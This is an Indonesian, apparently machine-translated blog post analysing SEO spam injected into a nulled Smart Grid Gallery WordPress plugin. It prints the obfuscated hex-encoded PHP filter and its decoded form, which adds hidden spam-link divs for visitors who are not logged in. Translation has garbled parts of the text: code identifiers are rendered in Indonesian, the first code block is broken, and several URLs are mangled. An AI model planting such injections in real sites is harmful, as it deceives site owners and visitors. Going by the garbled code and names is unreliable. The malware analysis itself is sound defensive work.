Tautan Spam SEO di Plugin Nulled

Tautan Spam SEO di Plugin Nulled – Bukan hal yang aneh melihat pemilik situs web menjalankan sesuatu dengan anggaran terbatas. Memilih perusahaan hosting yang aman dan andal, membeli nama domain yang bagus, meningkatkan posting di media sosial, dan memberi peringkat di mesin pencari — semua ini menghabiskan banyak uang. Pada akhirnya, beberapa pemilik situs bahkan dapat memilih untuk memotong pengeluaran dengan menginstal perangkat lunak bajakan (atau nulled) di situs web mereka.

Tautan Spam SEO di Plugin Nulled

Sayangnya, seperti yang dibahas di beberapa dari kami sebelumnya posting tentang perangkat lunak gratis dan verifikasi palsu, komponen “gratis” ini mungkin masih dijual dengan label harga yang lumayan. Orang yang sama yang menghapus pemeriksaan lisensi plugin atau tema mungkin juga telah menambahkan beberapa bentuk monetisasi lainnya — dan sering kali, hasil akhirnya tidak diinginkan.

Injeksi di Plugin Galeri Smart Grid

Kali ini, kami mengidentifikasi kode berbahaya yang disuntikkan di dalam Galeri Smart Grid pengaya. Kode berbahaya, yang ditemukan disuntikkan ke dalam SmartGridGalleryClass.php file, bahkan tidak mencoba untuk berhati-hati.

Terlihat di bawah, injeksi terdiri dari dua string yang disandikan hex panjang dan ironis maaf_fungsi.

if( ! function_exists('sorry_function')) 
   function sorry_function($content)  
if (is_user_logged_in())return $content; else is_single()) 
   $vNd25 = "74144151x7640163x74x79154145x3d42x70157x73151164x69x6fx6e72141x62x73x6f15416516414573164157160x3a6073154145146x7472557171x3971x701707342x3ex57x61x6ex7440x63162145x61x74x6540163151164x65x3fx20x46x69x6ex6440x3cx61x20x68x7214514675x22x68x74164x7072x2f57x64x6cx77x6f162144x70x72x65163163x2ex63x6fx6d574276x46x7214514540x57x6fx72x64x50162x65163x73x20124x68x65155145x73x3c57x617640x61x6e144x20x70x6c165147x69156x73x2ex3c5714415116676"; 
   $zoyBE = "74x64x69x76x20x73x74171154145x3dx22x70157163x69x74x69x6f156x3a141142163x6f154x75164x65x3bx7415716072x3073x6cx65x6616472x2dx397171x39x70x787342x3e104x69x64x20x79x6f16540x66x69156x6440141x7015340146157162x20x61156144162x6f1511447740x59x6fx75x20x63x61156x20146x69x6ex6440156145167407414140150162145146x3dx22150x74x741601637257x2fx64154x61156x64x72157151x6462x3456x63x6f155x2f42x3ex46x72145x6540x41x6ex64x7215715114440107141x6d145x7374x2fx617640x61156x64x20x61160x70163x2e74x2fx64x69x7676"; 
   $fullcontent = $vNd25 . $content . $zoyBE;  else  $fullcontent = $content;  return $fullcontent;  
add_filter('the_content', 'sorry_function'); 

Div Tersembunyi Meningkatkan Peringkat SEO

Setelah diterjemahkan, niat sebenarnya menjadi jelas. Itu menambahkan div tersembunyi yang menautkan ke dua situs web lain — mungkin terkait dengan orang yang sama yang membatalkan plugin — dalam upaya meningkatkan peringkat SEO mereka:

<?php 
if (!function_exists('sorry_function')) 
{ 
    function sorry_function($content) 
    { 
        if (is_user_logged_in()) 
         
            return $content; 
         
        else 
        { 
            if (is_page() || is_single()) 
            { 
               $vNd25 = '"<div style="position:absolute;top:0;left:-9999px;">Want create site? Find <a href="https://securityboulevard.com/2020/12/seo-spam-links-in-nulled-plugins/hxxp://dlwordpress[.]com/">Free WordPress Themes</a> and plugins.</div>"';                 
               $zoyBE = '"<div style="position:absolute;top:0;left:-9999px;">Did you find apk for android? You can find new <a href="https://securityboulevard.com/2020/12/seo-spam-links-in-nulled-plugins/hxxps://dlandroid24[.]com/">Free Android Games</a> and apps.</div>"'; 

Manuver & Sumber Menghindar

Injeksi ini memanfaatkan fungsi WordPress yang disebut tambahkan_filter yang “memungkinkan plugin untuk memodifikasi berbagai jenis data internal saat runtime.”

Dalam hal ini, kode berbahaya menggabungkan konten situs yang valid dengan dua div tersembunyi. Untuk menghindari deteksi, kondisi tertentu harus dipenuhi untuk menambahkan div ke situs: Ketika tidak ada pengguna yang masuk ke situs web, hanya dengan demikian injeksi berbahaya dapat ditambahkan ke halaman atau posting.

Setelah penyelidikan lebih lanjut, kami mengidentifikasi bahwa plugin yang diinstal adalah versi nulled dan telah diunduh dari situs web tema gratis hxxps://www[.]unduh tema gratis[.]co/smart-grid-gallery-v1-4-0-responsive-wordpress-gallery-plugin/. Kami dapat mengunduh plugin yang sama dengan injeksi yang sama, namun, tidak ada referensi ke situs ini dalam kode.

Sekarang, mengenai situs web yang dirujuk dalam injeksi berbahaya — dlwordpress[.]com dan dlandroid24[.]com — mereka jelas merupakan situs palsu yang digunakan untuk meningkatkan peringkat SEO dan menghasilkan uang dari program rujukan untuk situs web lain. Menggunakan PublicWWW selama penulisan artikel ini, dlwordpress disuntikkan di 7.040 situs dan dlandroid24 ditemukan di 6.262 situs. Majestic diidentifikasi dlwordpress di 5.000 situs, yang merupakan batas akun kami di sana.

Memeriksa dlwordpress[.]com

Memeriksa domain-domain yang ditemukan terletak di dalam suntikan berbahaya biasanya berarti jatuh ke dalam lubang hitam situs rujukan yang teduh, tetapi apa yang bisa saya katakan? Sangat menyenangkan untuk menggali ke dalam mereka. Saya memilih untuk menyorot dlwordpress karena saat ini lebih populer, dan sepertinya tidak sering berganti pemilik dlandroid24.

Saat mengakses situs web, kami disambut oleh posting yang ditulis oleh Vitaly Ray yang mengklaim bahwa mereka adalah salah satu penyedia tema, plugin, dan bahkan tutorial WordPress terbesar di dunia — meskipun satu-satunya tautan sebenarnya mengirim kami ke Theme Forest.

Di akhir posting, Anda akan menemukan beberapa tautan ke situs web perjudian (pemain kasino[.]com, agregator rujukan lain ke beberapa situs perjudian lain), yang mensponsori situs tersebut.

 

Mereka menambahkan gambar pemilik situs ke halaman utama — mungkin itu Vitaly Ray. Namun, pencarian gambar cepat di gambar Google mengembalikan gambar Kari Ruaridh, jadi mungkin orang “Vitaly Ray” ini sebenarnya bukan orang sungguhan.

Hasil pencarian gambar Google

Halaman iklan, yang tampaknya menjadi halaman terpenting kedua dari situs web, menunjukkan bahwa mereka menawarkan layanan iklan: “Jika Anda ingin beriklan, silakan hubungi kami di bawah ini. Slot iklan saat ini $2.500 per tahun.”

Kesimpulannya, pemilik situs harus selalu menghindari memasang tema/plugin nulled dari sumber apa pun. Sebagian besar perangkat lunak nulled berisi: pintu belakang berbahaya atau Spam SEO suntikan, yang dapat menimbulkan risiko keamanan serius bagi pengunjung dan lingkungan situs web Anda. Anda juga dapat mengaudit plugin yang ada untuk memastikan perangkat lunak null apa pun belum diinstal di lingkungan WordPress.

Leave a Comment